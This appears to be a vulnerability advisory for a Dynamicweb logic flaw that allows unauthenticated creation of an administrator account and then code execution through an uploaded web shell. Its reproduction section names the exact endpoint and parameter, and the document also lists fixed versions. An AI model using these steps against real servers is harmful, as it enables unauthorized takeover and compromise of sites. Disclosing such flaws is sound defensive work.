Dynamicweb Logic Flaw Allowing Unauthenticated Admin User Creation and Subsequent Remote Code Execution

A vulnerability exists in Dynamicweb versions prior to 9.12.8, allowing an attacker to create a new administrator user without authentication. This issue arises from a logic flaw in the application's setup phase management. Once the attacker gains access as the newly created admin, they can upload an executable file, such as a web shell, and execute commands on the server.

Impact

Exploitation of this vulnerability allows for unauthorized administrative access, followed by the ability to upload files and execute commands on the server, potentially leading to a full compromise of the application.

Reproduction

To reproduce this vulnerability, send a request to the 'Admin/Access/Setup/Default.aspx' endpoint with the 'Action' parameter set to 'createadministrator'. Include the desired username, password, email, and name for the new admin user. This request can be made without authentication. After the admin user is created, log in with the new credentials. Once authenticated, upload a web shell through the application's file upload functionality. The uploaded shell can be used to execute commands on the server.

Remediation

Users can upgrade to Dynamicweb versions 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9.8, 9.10.18, 9.12.8, or 9.13.0 and later.